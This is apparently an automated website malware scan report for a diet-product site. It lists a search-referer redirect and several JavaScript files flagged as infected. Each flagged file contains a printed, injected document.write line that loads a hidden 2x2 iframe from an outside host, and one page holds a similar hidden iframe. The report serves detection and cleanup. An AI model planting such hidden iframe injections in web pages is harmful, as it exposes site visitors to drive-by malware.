Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://clinicalslimdown.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: clinicalslimdown.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 17 Sep 2014 17:31:23 GMT Location: http://kozijnen.com/czof.html?h=664356 Server: Apache Content-Length: 292 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://clinicalslimdown.com/ | 200 OK Content-Length: 13714 Content-Type: text/html | clean |
http://clinicalslimdown.com/js/jquery.min.js | 200 OK Content-Length: 57410 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356></iframe>');
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kozijnen.com/czof.html?j=664356 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356> | ||
http://clinicalslimdown.com/js/featuredcontentglider.js | 200 OK Content-Length: 7470 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356></iframe>');
jQuery.noConflict() var featuredcontentglider={ leftrightkeys: [37, 39], csszindex: 100, ajaxloadingmsg: '<b>Fetching Content. Please wait...</b>', glide:function(config, showpage, isprev){ var selected=parseInt(showpage) if (selected>=config.$contentdivs.length){ alert("No else featuredcontentglider.setuptoggler($, config) $(window).bind('unload', function(){ config.$togglerdiv.unbind('click') config.$toc.unbind('click') config.$next.unbind('click') config.$prev.unbind('click') if (config.persiststate) featuredcontentglider.setCookie(config.gliderid, config.$togglerdiv.attr('lastselected')) config=null }) }) } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kozijnen.com/czof.html?j=664356 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356> | ||
http://clinicalslimdown.com/js/jqueryslidemenu.js | 200 OK Content-Length: 2666 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356></iframe>');
var arrowimages={down:['downarrowclass', '', 0], right:['rightarrowclass', '']} var jqueryslidemenu={ animateduration: {over: 200, out: 100}, buildmenu:function(menuid, arrowsvar){ jQuery(document).ready(function($){ var $mainmenu=$("#"+menuid+">ul") var $headers=$mainmenu.find("ul").parent }, function(e){ var $targetul=$(this).children("ul:eq(0)") $targetul.slideUp(jqueryslidemenu.animateduration.out) } ) $curobj.click(function(){ $(this).children("ul:eq(0)").hide() }) }) $mainmenu.find("ul").css({display:'none', visibility:'visible'}) }) } } jqueryslidemenu.buildmenu("myslidemenu", arrowimages) Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kozijnen.com/czof.html?j=664356 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356> | ||
http://clinicalslimdown.com/index.html | 200 OK Content-Length: 13714 Content-Type: text/html | clean |
http://clinicalslimdown.com/science.html | 200 OK Content-Length: 12558 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 35x1 src: http://nmsbaseball.com/post.php?id=687731 <iframe name=twitter scrolling=auto frameborder=no align=center height=1 width=35 src=http://nmsbaseball.com/post.php?id=687731> | ||
http://clinicalslimdown.com/program.html | 200 OK Content-Length: 11774 Content-Type: text/html | clean |
http://clinicalslimdown.com/recommended-foods.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://clinicalslimdown.com/test404page.js | 404 Not Found Content-Length: 418 Content-Type: text/html | clean |
http://clinicalslimdown.com/low-glycemic.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://clinicalslimdown.com/testimonial.html | 200 OK Content-Length: 9536 Content-Type: text/html | clean |
http://clinicalslimdown.com/contact-us.html | 200 OK Content-Length: 13920 Content-Type: text/html | clean |
http://clinicalslimdown.com/js/contactformvalidation.js | 200 OK Content-Length: 1992 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356></iframe>');
function has_id(id){try{var tmp=document.getElementById(id).value;}catch(e){return false;} return true;} function has_name(nm){try{var tmp=cfrm.nm.type;}catch(e){return false;} return true;} function $$(id){if(!has_id(id)&&!has_name(id)){alert("Field "+id+" does not exist!\n Form validation configur exp=/^[a-zA-Z0-9._%-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,4}$/; if($$(cvalue).match(exp)==null){ return false; } else{return true; } } else if(ctype=="NUMERIC"){ exp=/^\d+$/; if($$(cvalue).match(exp)==null){ return false; } else{return true; } } }, trim:function(s){if(s.length>0){return s.replace(/^\s+/,'').replace(/\s+$/,'');}else{return s;}}}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kozijnen.com/czof.html?j=664356 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=clinicalslimdown.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://clinicalslimdown.com/
Result: clinicalslimdown.com is not infected or malware details are not published yet.
Result: clinicalslimdown.com is not infected or malware details are not published yet.